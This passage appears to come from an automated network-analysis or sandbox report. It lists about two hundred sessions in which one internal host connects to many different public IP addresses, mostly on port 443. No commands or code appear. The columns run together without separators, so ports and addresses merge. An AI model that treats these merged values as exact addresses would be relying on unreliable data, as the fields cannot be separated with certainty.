                                                        11270192.168.2.144256682.80.58.199443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11271192.168.2.1435284118.157.250.183443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11272192.168.2.1447754191.129.150.183443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11273192.168.2.1432950219.174.209.248443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11274192.168.2.1457578204.13.18.193443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11275192.168.2.143995239.254.160.206443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11276192.168.2.1445602185.56.98.247443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11277192.168.2.1434410211.2.22.230443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11278192.168.2.143443872.201.160.13443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11279192.168.2.144904227.211.39.234443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11280192.168.2.144561098.115.251.108443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11281192.168.2.1445816162.192.229.108443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11282192.168.2.1446008138.205.180.59443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11283192.168.2.145445875.12.78.178443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11284192.168.2.145012014.141.113.52443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11285192.168.2.144782440.115.122.103443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11286192.168.2.1451470219.172.19.214443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11287192.168.2.144440863.225.51.97443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11288192.168.2.144965887.215.108.214443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11289192.168.2.1448530155.37.4.65443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11290192.168.2.1458420128.143.23.215443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11291192.168.2.145736284.147.81.211443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11292192.168.2.145069475.180.228.93443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11293192.168.2.1436912184.110.232.23443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11294192.168.2.1443264159.19.41.239443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11295192.168.2.1444680125.163.29.153443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11296192.168.2.1444566165.67.160.98443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11297192.168.2.14360941.85.255.197443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11298192.168.2.1445462195.21.97.130443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11299192.168.2.143644647.150.241.83443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11300192.168.2.1460396150.253.139.44443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11301192.168.2.14403661.97.165.136443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11302192.168.2.1457736107.54.51.12443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11303192.168.2.1436302204.120.254.222443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11304192.168.2.1433758172.172.248.169443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11305192.168.2.1446252109.53.57.147443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11306192.168.2.1452072136.188.218.239443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11307192.168.2.145348064.199.42.23443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11308192.168.2.1442218107.161.33.47443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11309192.168.2.1457160143.58.237.58443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11310192.168.2.1444180221.128.71.248443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11311192.168.2.1454386144.80.1.149443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11312192.168.2.143869478.26.43.241443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11313192.168.2.1451972192.24.89.241443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11314192.168.2.1434892103.194.73.28443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11315192.168.2.1459706113.10.218.81443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11316192.168.2.1444698160.196.139.124443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11317192.168.2.14468309.131.50.159443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11318192.168.2.1454176139.130.0.100443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11319192.168.2.145650020.220.233.229443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11320192.168.2.1451796219.23.118.113443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11321192.168.2.145969474.141.146.212443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11322192.168.2.144427657.167.44.102443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11323192.168.2.1438336188.126.24.104443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11324192.168.2.1440112134.186.177.169443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11325192.168.2.144857654.29.214.208443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11326192.168.2.1459212204.44.104.174443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11327192.168.2.14486264.89.113.27443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11328192.168.2.1437596108.140.45.92443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11329192.168.2.144408874.198.2.234443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11330192.168.2.144175497.25.90.4443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11331192.168.2.1436370103.2.24.211443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11332192.168.2.1437492145.34.134.47443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11333192.168.2.1456162219.192.131.74443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11334192.168.2.1456550167.36.124.53443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11335192.168.2.145709866.58.92.205443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11336192.168.2.1456302179.51.58.31443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11337192.168.2.1438882108.172.194.64443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11338192.168.2.1445536134.62.250.198443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11339192.168.2.144050442.196.145.121443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11340192.168.2.1447146196.149.68.199443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11341192.168.2.14488644.123.2.111443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11342192.168.2.1435580172.182.180.211443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11343192.168.2.1443314223.245.108.43443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11344192.168.2.1456690130.162.128.68443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11345192.168.2.145698447.73.6.182443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11346192.168.2.144487824.200.68.140443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11347192.168.2.1439002207.198.47.27443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11348192.168.2.144722641.194.48.196443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11349192.168.2.1438350216.240.11.196443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11350192.168.2.143873425.130.174.30443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11351192.168.2.145152857.82.155.118443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11352192.168.2.1455942143.131.39.246443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11353192.168.2.143300862.26.33.88443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11354192.168.2.1457582222.99.63.220443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11355192.168.2.145653067.46.222.238443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11356192.168.2.1433668128.255.52.6443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11357192.168.2.143350624.196.19.105443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11358192.168.2.1436032190.8.233.234443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11359192.168.2.143575683.13.33.248443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11360192.168.2.144705464.154.245.198443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11361192.168.2.144788285.219.80.16443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11362192.168.2.1438036189.166.59.22443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11363192.168.2.1448570138.78.53.5443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11364192.168.2.1433702145.117.110.56443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11365192.168.2.1451196114.110.29.175443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11366192.168.2.144229890.241.235.152443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11367192.168.2.144551442.99.104.173443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11368192.168.2.144659299.127.62.239443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11369192.168.2.1451558114.43.232.236443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11370192.168.2.1441906117.197.65.207443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11371192.168.2.1460352209.126.174.30443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11372192.168.2.1450380164.60.92.255443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11373192.168.2.1442056171.153.198.235443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11374192.168.2.144493490.112.227.108443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11375192.168.2.143786070.142.49.140443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11376192.168.2.143298695.166.182.230443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11377192.168.2.1434542191.175.64.221443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11378192.168.2.145243079.89.97.44443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11379192.168.2.1441808132.118.11.202443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11380192.168.2.144202651.33.7.193443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11381192.168.2.1454578157.218.151.65443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11382192.168.2.1444036204.133.99.12443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11383192.168.2.144935070.253.163.92443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11384192.168.2.1459484110.148.239.11443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11385192.168.2.1439448206.243.198.80443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11386192.168.2.1433332186.151.18.161443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11387192.168.2.143791074.81.212.26443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11388192.168.2.1447524184.135.100.245443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11389192.168.2.1435548218.186.161.79443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11390192.168.2.1458372194.63.167.195443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11391192.168.2.143523074.21.115.209443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11392192.168.2.144512475.190.10.148443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11393192.168.2.143345053.135.61.89443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11394192.168.2.1455410217.126.166.163443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11395192.168.2.1443066120.26.15.145443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11396192.168.2.1448634104.37.184.159443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11397192.168.2.1438868179.27.61.170443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11398192.168.2.143518284.150.7.10443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11399192.168.2.143454061.254.67.35443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11400192.168.2.1449430155.15.70.98443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11401192.168.2.1460838189.30.132.168443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11402192.168.2.1439706213.209.225.72443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11403192.168.2.1452742191.68.32.189443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11404192.168.2.144267482.172.187.80443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11405192.168.2.1455914118.94.22.225443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11406192.168.2.1438570183.232.164.243443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11407192.168.2.145663432.56.85.54443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11408192.168.2.1455854213.229.92.179443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11409192.168.2.1451920104.64.162.174443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11410192.168.2.1457540116.229.58.207443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11411192.168.2.145698086.111.122.215443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11412192.168.2.1457934105.248.226.21443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11413192.168.2.1458638197.32.215.71443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11414192.168.2.1443528129.23.234.36443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11415192.168.2.1433976124.241.125.171443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11416192.168.2.144758049.117.157.227443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11417192.168.2.144888469.148.7.42443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11418192.168.2.144438481.182.143.202443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11419192.168.2.1447762221.101.91.72443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11420192.168.2.1439810184.214.80.192443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11421192.168.2.1442336213.92.100.166443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11422192.168.2.145351859.244.232.19443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11423192.168.2.1453942145.93.59.183443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11424192.168.2.1435040184.229.172.0443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11425192.168.2.1455734165.41.58.89443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11426192.168.2.145834268.52.228.230443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11427192.168.2.1439936143.10.197.91443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11428192.168.2.1432800106.234.62.122443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11429192.168.2.1433180192.71.94.94443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11430192.168.2.1449980220.7.212.9443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11431192.168.2.144674462.52.247.206443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11432192.168.2.145587859.85.248.175443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11433192.168.2.1445332102.254.15.124443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11434192.168.2.145008423.80.109.200443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11435192.168.2.1459924103.87.21.159443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11436192.168.2.1446644104.16.147.1998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11437192.168.2.145879069.180.45.2258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11438192.168.2.1445702154.38.17.158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11439192.168.2.1448208112.4.150.1688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11440192.168.2.1433818204.168.186.28443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11441192.168.2.145674642.96.238.238443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11442192.168.2.1451250100.6.226.20443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11443192.168.2.145559892.9.90.43443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11444192.168.2.144474484.74.128.211443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11445192.168.2.14498664.123.252.94443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11446192.168.2.145331083.221.181.116443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11447192.168.2.1445216172.6.126.126443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11448192.168.2.1445596198.12.53.119443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11449192.168.2.1435860152.238.226.52443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11450192.168.2.1448088206.66.65.223443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11451192.168.2.1453148154.54.7.197443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11452192.168.2.143395054.231.7.41443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11453192.168.2.145537487.113.94.204443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11454192.168.2.1438410163.143.245.204443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11455192.168.2.1439650182.67.243.219443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11456192.168.2.1440780187.145.214.153443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11457192.168.2.1454804222.17.251.253443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11458192.168.2.1450360181.111.17.10443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11459192.168.2.1455628165.152.190.154443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11460192.168.2.145828069.128.224.203443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11461192.168.2.1458766145.111.105.249443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11462192.168.2.1444692141.171.176.194443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11463192.168.2.145962899.146.217.31443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11464192.168.2.145458048.5.196.24443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11465192.168.2.143855441.163.174.144443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11466192.168.2.143401476.155.97.153443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11467192.168.2.1437786168.2.112.148443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11468192.168.2.145174473.153.57.7443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11469192.168.2.144881060.60.244.127443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11470192.168.2.1450690107.49.127.21443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11471192.168.2.1452670157.184.37.7443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11472192.168.2.143685673.250.162.146443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11473192.168.2.1437502124.48.92.119443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11474192.168.2.1452936185.245.25.169443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11475192.168.2.1436160151.213.123.124443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11476192.168.2.1455902183.248.68.33443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11477192.168.2.143344479.91.39.246443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11478192.168.2.1446502137.193.46.165443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11479192.168.2.1443586160.67.115.20443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11480192.168.2.1439778160.46.90.198443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11481192.168.2.145486677.153.88.199443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11482192.168.2.1444892147.242.129.179443
